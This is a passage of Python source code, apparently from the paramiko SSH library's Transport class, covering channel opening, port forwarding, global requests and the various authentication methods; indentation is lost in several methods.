            `.SSHException` -- if negotiation fails (and no ``event`` was
            passed in)
        """
        # A default ServerInterface rejects everything; callers normally
        # supply their own implementation.
        if server is None:
            server = ServerInterface()
        self.server_mode = True
        self.server_object = server
        self.active = True
        if event is not None:
            # async, return immediately and let the app poll for completion
            self.completion_event = event
            self.start()
            return
        # synchronous, wait for a result
        self.completion_event = event = threading.Event()
        self.start()
        while True:
            event.wait(0.1)
            if not self.active:
                e = self.get_exception()
                if e is not None:
                    raise e
                raise SSHException("Negotiation failed.")
            if event.is_set():
                break
def add_server_key(self, key):
"""
Add a host key to the list of keys used for server mode. When behaving
as a server, the host key is used to sign certain packets during the
SSH2 negotiation, so that the client can trust that we are who we say
we are. Because this is used for signing, the key must contain private
key info, not just the public half. Only one key of each type (RSA or
DSS) is kept.
:param .PKey key:
the host key to add, usually an `.RSAKey` or `.DSSKey`.
"""
self.server_key_dict[key.get_name()] = key
def get_server_key(self):
"""
Return the active host key, in server mode. After negotiating with the
client, this method will return the negotiated host key. If only one
type of host key was set with `add_server_key`, that's the only key
that will ever be returned. But in cases where you have set more than
one type of host key (for example, an RSA key and a DSS key), the key
type will be negotiated by the client, and this method will return the
key of the type agreed on. If the host key has not been negotiated
yet, ``None`` is returned. In client mode, the behavior is undefined.
:return:
host key (`.PKey`) of the type negotiated by the client, or
``None``.
"""
try:
return self.server_key_dict[self.host_key_type]
except KeyError:
pass
return None
@staticmethod
def load_server_moduli(filename=None):
"""
(optional)
Load a file of prime moduli for use in doing group-exchange key
negotiation in server mode. It's a rather obscure option and can be
safely ignored.
In server mode, the remote client may request "group-exchange" key
negotiation, which asks the server to send a random prime number that
fits certain criteria. These primes are pretty difficult to compute,
so they can't be generated on demand. But many systems contain a file
of suitable primes (usually named something like ``/etc/ssh/moduli``).
If you call `load_server_moduli` and it returns ``True``, then this
file of primes has been loaded and we will support "group-exchange" in
server mode. Otherwise server mode will just claim that it doesn't
support that method of key negotiation.
:param str filename:
optional path to the moduli file, if you happen to know that it's
not in a standard location.
:return:
True if a moduli file was successfully loaded; False otherwise.
.. note:: This has no effect when used in client mode.
"""
Transport._modulus_pack = ModulusPack()
# places to look for the openssh "moduli" file
file_list = ["/etc/ssh/moduli", "/usr/local/etc/moduli"]
if filename is not None:
file_list.insert(0, filename)
for fn in file_list:
try:
Transport._modulus_pack.read_file(fn)
return True
except IOError:
pass
# none succeeded
Transport._modulus_pack = None
return False
def close(self):
"""
Close this session, and any open channels that are tied to it.
"""
if not self.active:
return
self.stop_thread()
for chan in list(self._channels.values()):
chan._unlink()
self.sock.close()
def get_remote_server_key(self):
"""
Return the host key of the server (in client mode).
.. note::
Previously this call returned a tuple of ``(key type, key
string)``. You can get the same effect by calling `.PKey.get_name`
for the key type, and ``str(key)`` for the key string.
:raises: `.SSHException` -- if no session is currently active.
:return: public key (`.PKey`) of the remote server
"""
if (not self.active) or (not self.initial_kex_done):
raise SSHException("No existing session")
return self.host_key
def is_active(self):
"""
Return true if this session is active (open).
:return:
True if the session is still active (open); False if the session is
closed
"""
return self.active
def open_session(
self, window_size=None, max_packet_size=None, timeout=None
):
"""
Request a new channel to the server, of type ``"session"``. This is
just an alias for calling `open_channel` with an argument of
``"session"``.
.. note:: Modifying the the window and packet sizes might have adverse
effects on the session created. The default values are the same
as in the OpenSSH code base and have been battle tested.
:param int window_size:
optional window size for this session.
:param int max_packet_size:
optional max packet size for this session.
:return: a new `.Channel`
:raises:
`.SSHException` -- if the request is rejected or the session ends
prematurely
.. versionchanged:: 1.13.4/1.14.3/1.15.3
Added the ``timeout`` argument.
.. versionchanged:: 1.15
Added the ``window_size`` and ``max_packet_size`` arguments.
"""
return self.open_channel(
"session",
window_size=window_size,
max_packet_size=max_packet_size,
timeout=timeout,
)
def open_x11_channel(self, src_addr=None):
"""
Request a new channel to the client, of type ``"x11"``. This
is just an alias for ``open_channel('x11', src_addr=src_addr)``.
:param tuple src_addr:
the source address (``(str, int)``) of the x11 server (port is the
x11 port, ie. 6010)
:return: a new `.Channel`
:raises:
`.SSHException` -- if the request is rejected or the session ends
prematurely
"""
return self.open_channel("x11", src_addr=src_addr)
def open_forward_agent_channel(self):
"""
Request a new channel to the client, of type
``"auth-agent@openssh.com"``.
This is just an alias for ``open_channel('auth-agent@openssh.com')``.
:return: a new `.Channel`
:raises: `.SSHException` --
if the request is rejected or the session ends prematurely
"""
return self.open_channel("auth-agent@openssh.com")
def open_forwarded_tcpip_channel(self, src_addr, dest_addr):
"""
Request a new channel back to the client, of type ``forwarded-tcpip``.
This is used after a client has requested port forwarding, for sending
incoming connections back to the client.
:param src_addr: originator's address
:param dest_addr: local (server) connected address
"""
return self.open_channel("forwarded-tcpip", dest_addr, src_addr)
    def open_channel(
        self,
        kind,
        dest_addr=None,
        src_addr=None,
        window_size=None,
        max_packet_size=None,
        timeout=None,
    ):
        """
        Request a new channel to the server. `Channels <.Channel>` are
        socket-like objects used for the actual transfer of data across the
        session. You may only request a channel after negotiating encryption
        (using `connect` or `start_client`) and authenticating.

        .. note:: Modifying the window and packet sizes might have adverse
            effects on the channel created. The default values are the same
            as in the OpenSSH code base and have been battle tested.

        :param str kind:
            the kind of channel requested (usually ``"session"``,
            ``"forwarded-tcpip"``, ``"direct-tcpip"``, or ``"x11"``)
        :param tuple dest_addr:
            the destination address (address + port tuple) of this port
            forwarding, if ``kind`` is ``"forwarded-tcpip"`` or
            ``"direct-tcpip"`` (ignored for other channel types)
        :param src_addr: the source address of this port forwarding, if
            ``kind`` is ``"forwarded-tcpip"``, ``"direct-tcpip"``, or ``"x11"``
        :param int window_size:
            optional window size for this session.
        :param int max_packet_size:
            optional max packet size for this session.
        :param float timeout:
            optional timeout opening a channel, default 3600s (1h)
        :return: a new `.Channel` on success
        :raises:
            `.SSHException` -- if the request is rejected, the session ends
            prematurely or there is a timeout opening a channel

        .. versionchanged:: 1.15
            Added the ``window_size`` and ``max_packet_size`` arguments.
        """
        if not self.active:
            raise SSHException("SSH session not active")
        timeout = 3600 if timeout is None else timeout
        # Hold the transport lock while allocating a channel id and
        # registering the channel, so concurrent opens can't collide.
        self.lock.acquire()
        try:
            window_size = self._sanitize_window_size(window_size)
            max_packet_size = self._sanitize_packet_size(max_packet_size)
            chanid = self._next_channel()
            # Build the CHANNEL_OPEN request per the channel kind.
            m = Message()
            m.add_byte(cMSG_CHANNEL_OPEN)
            m.add_string(kind)
            m.add_int(chanid)
            m.add_int(window_size)
            m.add_int(max_packet_size)
            if (kind == "forwarded-tcpip") or (kind == "direct-tcpip"):
                m.add_string(dest_addr[0])
                m.add_int(dest_addr[1])
                m.add_string(src_addr[0])
                m.add_int(src_addr[1])
            elif kind == "x11":
                m.add_string(src_addr[0])
                m.add_int(src_addr[1])
            chan = Channel(chanid)
            self._channels.put(chanid, chan)
            # The reader thread sets this event when the server answers.
            self.channel_events[chanid] = event = threading.Event()
            self.channels_seen[chanid] = True
            chan._set_transport(self)
            chan._set_window(window_size, max_packet_size)
        finally:
            self.lock.release()
        # Send outside the lock, then poll for the server's response.
        self._send_user_message(m)
        start_ts = time.time()
        while True:
            event.wait(0.1)
            if not self.active:
                e = self.get_exception()
                if e is None:
                    e = SSHException("Unable to open channel.")
                raise e
            if event.is_set():
                break
            elif start_ts + timeout < time.time():
                raise SSHException("Timeout opening channel.")
        # A failed open removes the channel from the map, so a None lookup
        # here means the server rejected the request.
        chan = self._channels.get(chanid)
        if chan is not None:
            return chan
        e = self.get_exception()
        if e is None:
            e = SSHException("Unable to open channel.")
        raise e
def request_port_forward(self, address, port, handler=None):
"""
Ask the server to forward TCP connections from a listening port on
the server, across this SSH session.
If a handler is given, that handler is called from a different thread
whenever a forwarded connection arrives. The handler parameters are::
handler(
channel,
(origin_addr, origin_port),
(server_addr, server_port),
)
where ``server_addr`` and ``server_port`` are the address and port that
the server was listening on.
If no handler is set, the default behavior is to send new incoming
forwarded connections into the accept queue, to be picked up via
`accept`.
:param str address: the address to bind when forwarding
:param int port:
the port to forward, or 0 to ask the server to allocate any port
:param callable handler:
optional handler for incoming forwarded connections, of the form
``func(Channel, (str, int), (str, int))``.
:return: the port number (`int`) allocated by the server
:raises:
`.SSHException` -- if the server refused the TCP forward request
"""
if not self.active:
raise SSHException("SSH session not active")
port = int(port)
response = self.global_request(
"tcpip-forward", (address, port), wait=True
)
if response is None:
raise SSHException("TCP forwarding request denied")
if port == 0:
port = response.get_int()
if handler is None:
def default_handler(channel, src_addr, dest_addr_port):
# src_addr, src_port = src_addr_port
# dest_addr, dest_port = dest_addr_port
self._queue_incoming_channel(channel)
handler = default_handler
self._tcp_handler = handler
return port
def cancel_port_forward(self, address, port):
"""
Ask the server to cancel a previous port-forwarding request. No more
connections to the given address & port will be forwarded across this
ssh connection.
:param str address: the address to stop forwarding
:param int port: the port to stop forwarding
"""
if not self.active:
return
self._tcp_handler = None
self.global_request("cancel-tcpip-forward", (address, port), wait=True)
def open_sftp_client(self):
"""
Create an SFTP client channel from an open transport. On success, an
SFTP session will be opened with the remote host, and a new
`.SFTPClient` object will be returned.
:return:
a new `.SFTPClient` referring to an sftp session (channel) across
this transport
"""
return SFTPClient.from_transport(self)
def send_ignore(self, byte_count=None):
"""
Send a junk packet across the encrypted link. This is sometimes used
to add "noise" to a connection to confuse would-be attackers. It can
also be used as a keep-alive for long lived connections traversing
firewalls.
:param int byte_count:
the number of random bytes to send in the payload of the ignored
packet -- defaults to a random number from 10 to 41.
"""
m = Message()
m.add_byte(cMSG_IGNORE)
if byte_count is None:
byte_count = (byte_ord(os.urandom(1)) % 32) + 10
m.add_bytes(os.urandom(byte_count))
self._send_user_message(m)
def renegotiate_keys(self):
"""
Force this session to switch to new keys. Normally this is done
automatically after the session hits a certain number of packets or
bytes sent or received, but this method gives you the option of forcing
new keys whenever you want. Negotiating new keys causes a pause in
traffic both ways as the two sides swap keys and do computations. This
method returns when the session has switched to new keys.
:raises:
`.SSHException` -- if the key renegotiation failed (which causes
the session to end)
"""
self.completion_event = threading.Event()
self._send_kex_init()
while True:
self.completion_event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is not None:
raise e
raise SSHException("Negotiation failed.")
if self.completion_event.is_set():
break
return
def set_keepalive(self, interval):
"""
Turn on/off keepalive packets (default is off). If this is set, after
``interval`` seconds without sending any data over the connection, a
"keepalive" packet will be sent (and ignored by the remote host). This
can be useful to keep connections alive over a NAT, for example.
:param int interval:
seconds to wait before sending a keepalive packet (or
0 to disable keepalives).
"""
def _request(x=weakref.proxy(self)):
return x.global_request("keepalive@lag.net", wait=False)
self.packetizer.set_keepalive(interval, _request)
    def global_request(self, kind, data=None, wait=True):
        """
        Make a global request to the remote host. These are normally
        extensions to the SSH2 protocol.

        :param str kind: name of the request.
        :param tuple data:
            an optional tuple containing additional data to attach to the
            request.
        :param bool wait:
            ``True`` if this method should not return until a response is
            received; ``False`` otherwise.
        :return:
            a `.Message` containing possible additional data if the request
            was successful (or an empty `.Message` if ``wait`` was ``False``);
            ``None`` if the request was denied.
        """
        # Arm the completion event BEFORE sending, so the reader thread can't
        # signal a response we aren't yet waiting on.
        if wait:
            self.completion_event = threading.Event()
        m = Message()
        m.add_byte(cMSG_GLOBAL_REQUEST)
        m.add_string(kind)
        # The wire-level "want reply" flag mirrors our local `wait` choice.
        m.add_boolean(wait)
        if data is not None:
            m.add(*data)
        self._log(DEBUG, 'Sending global request "{}"'.format(kind))
        self._send_user_message(m)
        if not wait:
            return None
        # Poll for the reply; a dead session yields None rather than raising.
        while True:
            self.completion_event.wait(0.1)
            if not self.active:
                return None
            if self.completion_event.is_set():
                break
        # The reader thread stores the reply (or None on denial) here.
        return self.global_response
def accept(self, timeout=None):
"""
Return the next channel opened by the client over this transport, in
server mode. If no channel is opened before the given timeout,
``None`` is returned.
:param int timeout:
seconds to wait for a channel, or ``None`` to wait forever
:return: a new `.Channel` opened by the client
"""
self.lock.acquire()
try:
if len(self.server_accepts) > 0:
chan = self.server_accepts.pop(0)
else:
self.server_accept_cv.wait(timeout)
if len(self.server_accepts) > 0:
chan = self.server_accepts.pop(0)
else:
# timeout
chan = None
finally:
self.lock.release()
return chan
    def connect(
        self,
        hostkey=None,
        username="",
        password=None,
        pkey=None,
        gss_host=None,
        gss_auth=False,
        gss_kex=False,
        gss_deleg_creds=True,
        gss_trust_dns=True,
    ):
        """
        Negotiate an SSH2 session, and optionally verify the server's host key
        and authenticate using a password or private key.  This is a shortcut
        for `start_client`, `get_remote_server_key`, and
        `Transport.auth_password` or `Transport.auth_publickey`.  Use those
        methods if you want more control.

        You can use this method immediately after creating a Transport to
        negotiate encryption with a server.  If it fails, an exception will be
        thrown.  On success, the method will return cleanly, and an encrypted
        session exists.  You may immediately call `open_channel` or
        `open_session` to get a `.Channel` object, which is used for data
        transfer.

        .. note::
            If you fail to supply a password or private key, this method may
            succeed, but a subsequent `open_channel` or `open_session` call may
            fail because you haven't authenticated yet.

        :param .PKey hostkey:
            the host key expected from the server, or ``None`` if you don't
            want to do host key verification.
        :param str username: the username to authenticate as.
        :param str password:
            a password to use for authentication, if you want to use password
            authentication; otherwise ``None``.
        :param .PKey pkey:
            a private key to use for authentication, if you want to use private
            key authentication; otherwise ``None``.
        :param str gss_host:
            The target's name in the kerberos database. Default: hostname
        :param bool gss_auth:
            ``True`` if you want to use GSS-API authentication.
        :param bool gss_kex:
            Perform GSS-API Key Exchange and user authentication.
        :param bool gss_deleg_creds:
            Whether to delegate GSS-API client credentials.
        :param gss_trust_dns:
            Indicates whether or not the DNS is trusted to securely
            canonicalize the name of the host being connected to (default
            ``True``).

        :raises: `.SSHException` -- if the SSH2 negotiation fails, the host key
            supplied by the server is incorrect, or authentication fails.

        .. versionchanged:: 2.3
            Added the ``gss_trust_dns`` argument.
        """
        if hostkey is not None:
            # Narrow the preferred key types to the one we were given, so the
            # server must prove possession of exactly that key.
            self._preferred_keys = [hostkey.get_name()]
        self.set_gss_host(
            gss_host=gss_host,
            trust_dns=gss_trust_dns,
            gssapi_requested=gss_kex or gss_auth,
        )
        self.start_client()
        # check host key if we were given one
        # If GSS-API Key Exchange was performed, we are not required to check
        # the host key.
        if (hostkey is not None) and not gss_kex:
            key = self.get_remote_server_key()
            if (
                key.get_name() != hostkey.get_name()
                or key.asbytes() != hostkey.asbytes()
            ):
                self._log(DEBUG, "Bad host key from server")
                self._log(
                    DEBUG,
                    "Expected: {}: {}".format(
                        hostkey.get_name(), repr(hostkey.asbytes())
                    ),
                )
                self._log(
                    DEBUG,
                    "Got     : {}: {}".format(
                        key.get_name(), repr(key.asbytes())
                    ),
                )
                raise SSHException("Bad host key from server")
            self._log(
                DEBUG, "Host key verified ({})".format(hostkey.get_name())
            )
        if (pkey is not None) or (password is not None) or gss_auth or gss_kex:
            if gss_auth:
                self._log(
                    DEBUG, "Attempting GSS-API auth... (gssapi-with-mic)"
                )  # noqa
                self.auth_gssapi_with_mic(
                    username, self.gss_host, gss_deleg_creds
                )
            elif gss_kex:
                self._log(DEBUG, "Attempting GSS-API auth... (gssapi-keyex)")
                self.auth_gssapi_keyex(username)
            elif pkey is not None:
                self._log(DEBUG, "Attempting public-key auth...")
                self.auth_publickey(username, pkey)
            else:
                self._log(DEBUG, "Attempting password auth...")
                self.auth_password(username, password)
        return
def get_exception(self):
"""
Return any exception that happened during the last server request.
This can be used to fetch more specific error information after using
calls like `start_client`. The exception (if any) is cleared after
this call.
:return:
an exception, or ``None`` if there is no stored exception.
.. versionadded:: 1.1
"""
self.lock.acquire()
try:
e = self.saved_exception
self.saved_exception = None
return e
finally:
self.lock.release()
def set_subsystem_handler(self, name, handler, *larg, **kwarg):
"""
Set the handler class for a subsystem in server mode. If a request
for this subsystem is made on an open ssh channel later, this handler
will be constructed and called -- see `.SubsystemHandler` for more
detailed documentation.
Any extra parameters (including keyword arguments) are saved and
passed to the `.SubsystemHandler` constructor later.
:param str name: name of the subsystem.
:param handler:
subclass of `.SubsystemHandler` that handles this subsystem.
"""
try:
self.lock.acquire()
self.subsystem_table[name] = (handler, larg, kwarg)
finally:
self.lock.release()
def is_authenticated(self):
"""
Return true if this session is active and authenticated.
:return:
True if the session is still open and has been authenticated
successfully; False if authentication failed and/or the session is
closed.
"""
return (
self.active
and self.auth_handler is not None
and self.auth_handler.is_authenticated()
)
def get_username(self):
"""
Return the username this connection is authenticated for. If the
session is not authenticated (or authentication failed), this method
returns ``None``.
:return: username that was authenticated (a `str`), or ``None``.
"""
if not self.active or (self.auth_handler is None):
return None
return self.auth_handler.get_username()
def get_banner(self):
"""
Return the banner supplied by the server upon connect. If no banner is
supplied, this method returns ``None``.
:returns: server supplied banner (`str`), or ``None``.
.. versionadded:: 1.13
"""
if not self.active or (self.auth_handler is None):
return None
return self.auth_handler.banner
def auth_none(self, username):
"""
Try to authenticate to the server using no authentication at all.
This will almost always fail. It may be useful for determining the
list of authentication types supported by the server, by catching the
`.BadAuthenticationType` exception raised.
:param str username: the username to authenticate as
:return:
list of auth types permissible for the next stage of
authentication (normally empty)
:raises:
`.BadAuthenticationType` -- if "none" authentication isn't allowed
by the server for this user
:raises:
`.SSHException` -- if the authentication failed due to a network
error
.. versionadded:: 1.5
"""
if (not self.active) or (not self.initial_kex_done):
raise SSHException("No existing session")
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_none(username, my_event)
return self.auth_handler.wait_for_response(my_event)
    def auth_password(self, username, password, event=None, fallback=True):
        """
        Authenticate to the server using a password.  The username and
        password are sent over an encrypted link.

        If an ``event`` is passed in, this method will return immediately, and
        the event will be triggered once authentication succeeds or fails.  On
        success, `is_authenticated` will return ``True``.  On failure, you may
        use `get_exception` to get more detailed error information.

        Since 1.1, if no event is passed, this method will block until the
        authentication succeeds or fails.  On failure, an exception is raised.
        Otherwise, the method simply returns.

        Since 1.5, if no event is passed and ``fallback`` is ``True`` (the
        default), if the server doesn't support plain password authentication
        but does support so-called "keyboard-interactive" mode, an attempt
        will be made to authenticate using this interactive mode.  If it
        fails, the normal exception will be thrown as if the attempt had never
        been made.  This is useful for some recent Gentoo and Debian
        distributions, which turn off plain password authentication in a
        misguided belief that interactive authentication is "more secure".
        (It's not.)

        If the server requires multi-step authentication (which is very rare),
        this method will return a list of auth types permissible for the next
        step.  Otherwise, in the normal case, an empty list is returned.

        :param str username: the username to authenticate as
        :param basestring password: the password to authenticate with
        :param .threading.Event event:
            an event to trigger when the authentication attempt is complete
            (whether it was successful or not)
        :param bool fallback:
            ``True`` if an attempt at an automated "interactive" password auth
            should be made if the server doesn't support normal password auth
        :return:
            list of auth types permissible for the next stage of
            authentication (normally empty)

        :raises:
            `.BadAuthenticationType` -- if password authentication isn't
            allowed by the server for this user (and no event was passed in)
        :raises:
            `.AuthenticationException` -- if the authentication failed (and no
            event was passed in)
        :raises: `.SSHException` -- if there was a network error
        """
        if (not self.active) or (not self.initial_kex_done):
            # we should never try to send the password unless we're on a secure
            # link
            raise SSHException("No existing session")
        if event is None:
            my_event = threading.Event()
        else:
            my_event = event
        self.auth_handler = AuthHandler(self)
        self.auth_handler.auth_password(username, password, my_event)
        if event is not None:
            # caller wants to wait for event themselves
            return []
        try:
            return self.auth_handler.wait_for_response(my_event)
        except BadAuthenticationType as e:
            # if password auth isn't allowed, but keyboard-interactive *is*,
            # try to fudge it
            if not fallback or ("keyboard-interactive" not in e.allowed_types):
                raise
            try:
                # Pretend the single interactive prompt is a password prompt
                # and answer it with the password we already have.
                def handler(title, instructions, fields):
                    if len(fields) > 1:
                        raise SSHException("Fallback authentication failed.")
                    if len(fields) == 0:
                        # for some reason, at least on os x, a 2nd request will
                        # be made with zero fields requested.  maybe it's just
                        # to try to fake out automated scripting of the exact
                        # type we're doing here.  *shrug* :)
                        return []
                    return [password]
                return self.auth_interactive(username, handler)
            except SSHException:
                # attempt failed; just raise the original exception
                raise e
def auth_publickey(self, username, key, event=None):
"""
Authenticate to the server using a private key. The key is used to
sign data from the server, so it must include the private part.
If an ``event`` is passed in, this method will return immediately, and
the event will be triggered once authentication succeeds or fails. On
success, `is_authenticated` will return ``True``. On failure, you may
use `get_exception` to get more detailed error information.
Since 1.1, if no event is passed, this method will block until the
authentication succeeds or fails. On failure, an exception is raised.
Otherwise, the method simply returns.
If the server requires multi-step authentication (which is very rare),
this method will return a list of auth types permissible for the next
step. Otherwise, in the normal case, an empty list is returned.
:param str username: the username to authenticate as
:param .PKey key: the private key to authenticate with
:param .threading.Event event:
an event to trigger when the authentication attempt is complete
(whether it was successful or not)
:return:
list of auth types permissible for the next stage of
authentication (normally empty)
:raises:
`.BadAuthenticationType` -- if public-key authentication isn't
allowed by the server for this user (and no event was passed in)
:raises:
`.AuthenticationException` -- if the authentication failed (and no
event was passed in)
:raises: `.SSHException` -- if there was a network error
"""
if (not self.active) or (not self.initial_kex_done):
# we should never try to authenticate unless we're on a secure link
raise SSHException("No existing session")
if event is None:
my_event = threading.Event()
else:
my_event = event
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_publickey(username, key, my_event)
if event is not None:
# caller wants to wait for event themselves
return []
return self.auth_handler.wait_for_response(my_event)
    def auth_interactive(self, username, handler, submethods=""):
        """
        Authenticate to the server interactively.  A handler is used to answer
        arbitrary questions from the server.  On many servers, this is just a
        dumb wrapper around PAM.

        This method will block until the authentication succeeds or fails,
        periodically calling the handler asynchronously to get answers to
        authentication questions.  The handler may be called more than once
        if the server continues to ask questions.

        The handler is expected to be a callable that will handle calls of the
        form: ``handler(title, instructions, prompt_list)``.  The ``title`` is
        meant to be a dialog-window title, and the ``instructions`` are user
        instructions (both are strings).  ``prompt_list`` will be a list of
        prompts, each prompt being a tuple of ``(str, bool)``.  The string is
        the prompt and the boolean indicates whether the user text should be
        echoed.

        A sample call would thus be:
        ``handler('title', 'instructions', [('Password:', False)])``.

        The handler should return a list or tuple of answers to the server's
        questions.

        If the server requires multi-step authentication (which is very rare),
        this method will return a list of auth types permissible for the next
        step.  Otherwise, in the normal case, an empty list is returned.

        :param str username: the username to authenticate as
        :param callable handler: a handler for responding to server questions
        :param str submethods: a string list of desired submethods (optional)
        :return:
            list of auth types permissible for the next stage of
            authentication (normally empty).

        :raises: `.BadAuthenticationType` -- if public-key authentication isn't
            allowed by the server for this user
        :raises: `.AuthenticationException` -- if the authentication failed
        :raises: `.SSHException` -- if there was a network error

        .. versionadded:: 1.5
        """
        if (not self.active) or (not self.initial_kex_done):
            # we should never try to authenticate unless we're on a secure link
            raise SSHException("No existing session")
        my_event = threading.Event()
        self.auth_handler = AuthHandler(self)
        self.auth_handler.auth_interactive(
            username, handler, my_event, submethods
        )
        return self.auth_handler.wait_for_response(my_event)
def auth_interactive_dumb(self, username, handler=None, submethods=""):
"""
Autenticate to the server interactively but dumber.
Just print the prompt and / or instructions to stdout and send back
the response. This is good for situations where partial auth is
achieved by key and then the user has to enter a 2fac token.
"""
if not handler:
def handler(title, instructions, prompt_list):
answers = []
if title:
print(title.strip())
if instructions:
print(instructions.strip())
for prompt, show_input in prompt_list:
print(prompt.strip(), end=" ")
answers.append(input())
return answers
return self.auth_interactive(username, handler, submethods)
def auth_gssapi_with_mic(self, username, gss_host, gss_deleg_creds):
"""
Authenticate to the Server using GSS-API / SSPI.
:param str username: The username to authenticate as
:param str gss_host: The target host
:param bool gss_deleg_creds: Delegate credentials or not
:return: list of auth types permissible for the next stage of
authentication (normally empty)
:raises: `.BadAuthenticationType` -- if gssapi-with-mic isn't
allowed by the server (and no event was passed in)
:raises:
`.AuthenticationException` -- if the authentication failed (and no
event was passed in)
:raises: `.SSHException` -- if there was a network error
"""
if (not self.active) or (not self.initial_kex_done):
# we should never try to authenticate unless we're on a secure link
raise SSHException("No existing session")
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_gssapi_with_mic(
username, gss_host, gss_deleg_creds, my_event
)
return self.auth_handler.wait_for_response(my_event)
def auth_gssapi_keyex(self, username):
"""
Authenticate to the server with GSS-API/SSPI if GSS-API kex is in use.
:param str username: The username to authenticate as.
:returns:
a list of auth types permissible for the next stage of
authentication (normally empty)
:raises: `.BadAuthenticationType` --
if GSS-API Key Exchange was not performed (and no event was passed
in)
:raises: `.AuthenticationException` --
if the authentication failed (and no event was passed in)
:raises: `.SSHException` -- if there was a network error
"""
if (not self.active) or (not self.initial_kex_done):
# we should never try to authenticate unless we're on a secure link
raise SSHException("No existing session")
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_gssapi_keyex(username, my_event)
return self.auth_handler.wait_for_response(my_event)
def set_log_channel(self, name):
"""
Set the channel for this transport's logging. The default is
``"paramiko.transport"`` but it can be set to anything you want. (See
the `.logging` module for more info.) SSH Channels will log to a
sub-channel of the one specified.
:param str name: new channel name for logging
.. versionadded:: 1.1
"""
self.log_name = name
self.logger = util.get_logger(name)
self.packetizer.set_log(self.logger)
    def get_log_channel(self):
        """
        Return the channel name used for this transport's logging.

        :return: channel name as a `str`

        .. versionadded:: 1.2
        """
        return self.log_name
    def set_hexdump(self, hexdump):
        """
        Turn on/off logging a hex dump of protocol traffic at DEBUG level in
        the logs.  Normally you would want this off (which is the default),
        but if you are debugging something, it may be useful.

        :param bool hexdump:
            ``True`` to log protocol traffix (in hex) to the log; ``False``
            otherwise.
        """
        # The packetizer owns the wire-level I/O, so the flag lives there.
        self.packetizer.set_hexdump(hexdump)
    def get_hexdump(self):
        """
        Return ``True`` if the transport is currently logging hex dumps of
        protocol traffic.

        :return: ``True`` if hex dumps are being logged, else ``False``.

        .. versionadded:: 1.4
        """
        return self.packetizer.get_hexdump()
def use_compression(self, compress=True):
"""
Turn on/off compression. This will only have an affect before starting
the transport (ie before calling `connect`, etc). By default,
compression is off since it negatively affects interactive sessions.
:param bool compress:
``True`` to ask the remote client/server to compress traffic;
``False`` to refuse compression
.. versionadded:: 1.5.2
"""
if compress:
self._preferred_compression = ("zlib@openssh.com", "zlib", "none")
else:
self._preferred_compression = ("none",)
def getpeername(self):
"""
Return the address of the remote side of this Transport, if possible.
This is effectively a wrapper around ``getpeername`` on the underlying
socket. If the socket-like object has no ``getpeername`` method, then
``("unknown", 0)`` is returned.
:return:
the address of the remote host, if known, as a ``(str, int)``
tuple.
"""
gp = getattr(self.sock, "getpeername", None)
if gp is None:
return "unknown", 0
return gp()
    def stop_thread(self):
        """
        Shut down the transport's worker thread and wait for it to exit.

        Marks the session inactive, closes the packetizer, then joins the
        thread (unless called from within that thread itself).
        """
        self.active = False
        self.packetizer.close()
        if PY2:
            # Original join logic; #520 doesn't appear commonly present under
            # Python 2.
            while self.is_alive() and self is not threading.current_thread():
                self.join(10)
        else:
            # Keep trying to join() our main thread, quickly, until:
            # * We join()ed successfully (self.is_alive() == False)
            # * Or it looks like we've hit issue #520 (socket.recv hitting some
            # race condition preventing it from timing out correctly), wherein
            # our socket and packetizer are both closed (but where we'd
            # otherwise be sitting forever on that recv()).
            while (
                self.is_alive()
                and self is not threading.current_thread()
                and not self.sock._closed
                and not self.packetizer.closed
            ):
                self.join(0.1)
# internals...
def _log(self, level, msg, *args):
if issubclass(type(msg), list):
for m in msg:
self.logger.log(level, m)
else:
self.logger.log(level, msg, *args)
    def _get_modulus_pack(self):
        """used by KexGex to find primes for group exchange"""
        return self._modulus_pack
    def _next_channel(self):
        """you are holding the lock"""
        # Scan forward (with 24-bit wraparound) past any IDs still in use.
        chanid = self._channel_counter
        while self._channels.get(chanid) is not None:
            self._channel_counter = (self._channel_counter + 1) & 0xffffff
            chanid = self._channel_counter
        # Advance past the ID we are handing out so the next call starts fresh.
        self._channel_counter = (self._channel_counter + 1) & 0xffffff
        return chanid
    def _unlink_channel(self, chanid):
        """used by a Channel to remove itself from the active channel list"""
        self._channels.delete(chanid)
    def _send_message(self, data):
        # Thin wrapper: hand the outgoing Message straight to the packetizer.
        self.packetizer.send_message(data)
    def _send_user_message(self, data):
        """
        send a message, but block if we're in key negotiation.  this is used
        for user-initiated requests.

        :raises SSHException: if key negotiation does not finish within
            ``clear_to_send_timeout`` seconds.
        """
        start = time.time()
        while True:
            # Wait briefly for the "clear to send" flag, re-checking liveness
            # each iteration so we don't hang on a dead connection.
            self.clear_to_send.wait(0.1)
            if not self.active:
                self._log(
                    DEBUG, "Dropping user packet because connection is dead."
                )  # noqa
                return
            # Re-check the flag *while holding the lock* so a rekey can't
            # start between the check and the send below.
            self.clear_to_send_lock.acquire()
            if self.clear_to_send.is_set():
                break
            self.clear_to_send_lock.release()
            if time.time() > start + self.clear_to_send_timeout:
                raise SSHException(
                    "Key-exchange timed out waiting for key negotiation"
                )  # noqa
        try:
            # The lock is still held here (acquired just before `break`).
            self._send_message(data)
        finally:
            self.clear_to_send_lock.release()
    def _set_K_H(self, k, h):
        """
        Used by a kex obj to set the K (root key) and H (exchange hash).
        """
        self.K = k
        self.H = h
        # The first exchange hash becomes the permanent session id; later
        # re-keys must not overwrite it.
        if self.session_id is None:
            self.session_id = h
    def _expect_packet(self, *ptypes):
        """
        Used by a kex obj to register the next packet type it expects to see.
        """
        # run() raises SSHException if the next packet isn't one of these.
        self._expected_packet = tuple(ptypes)
    def _verify_key(self, host_key, sig):
        """
        Verify the server's signature over the exchange hash with its host
        key; on success the parsed key is stored as ``self.host_key``.

        :raises SSHException: if the key type is unknown or the signature
            does not verify.
        """
        key = self._key_info[self.host_key_type](Message(host_key))
        if key is None:
            raise SSHException("Unknown host key type")
        # The signature must cover H, the exchange hash computed during kex.
        if not key.verify_ssh_sig(self.H, Message(sig)):
            raise SSHException(
                "Signature verification ({}) failed.".format(
                    self.host_key_type
                )
            )  # noqa
        self.host_key = key
    def _compute_key(self, id, nbytes):
        """id is 'A' - 'F' for the various keys used by ssh"""
